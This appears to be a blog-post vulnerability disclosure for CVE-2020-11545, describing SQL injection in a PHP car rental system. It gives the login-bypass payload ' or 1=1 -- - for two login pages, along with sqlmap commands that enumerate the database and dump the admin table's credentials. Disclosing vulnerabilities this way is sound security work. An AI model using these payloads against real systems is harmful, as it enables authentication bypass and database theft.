CVE-2020-11545

Project Worlds Official Car Rental System 1 is vulnerable to multiple SQL injection issues, as demonstrated by below.

ParameterFilename
email
pass
account.php
uname
pass
login.php
idbook_car.php
Vulnerable parameters for the files.

Impact: These vulnerabilities allows an attacker to dump the MySQL database and to bypass the login authentication prompt.


Discovering the Vulnerabilities

I installed the Project on my Ubuntu VM using Apache2 and MySQL. There are two different login pages depending on the type of user – customer or administrator. Customers are supposed to login with account.php, administrators are supposed to login with login.php. After static code analysis, I saw that the user inputs are not sanitized. Rather, user input is used directly in the query to the SQL database.

I further analyzed the web application, and saw a potential vulnerable URL on book_car.php. I intercepted the GET request and saved it to a file which I could then import to sqlmap for further testing.

Verifying the Vulnerabilities

account.php

account.php vulnerable query statement

Payload: ' or 1=1 -- -

Failed login with invalid credentials
email parameter injection
pass parameter injection

login.php
login.php vulnerable query statement

Payload: ' or 1=1 -- -

Failed login with invalid credentials
uname parameter injection
pass parameter injection
book_car.php
book_car.php vulnerable query statement

I intercepted the GET request to list the details of the car, and saved it to a file. Following this, I used the sqlmap tool to test for vulnerabilities.

# URL: /book_car.php?id=1
$ sqlmap -r <book_car_request> -o
sqlmap discovering the time based blind injection

We are able to use SQLmap to further enumerate the database:

$ sqlmap -r <book_car_request> --current-db
[...]
[11:58:47] [INFO] fetching current database
current database: 'cars'
$ sqlmap -r <book_car_request> -D cars --tables
[...]
Database: cars
[5 tables]
+---------+
| admin   |
| cars    |
| client  |
| hire    |
| message |
+---------+
$ sqlmap -r <book_car_request> -D cars -T admin --dump
[...]
Database: cars
Table: admin
[1 entry]
+----------+-------+-------+
| admin_id | pass  | uname |
+----------+-------+-------+
| 1        | admin | admin |
+----------+-------+-------+

1 thought on “CVE-2020-11545

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.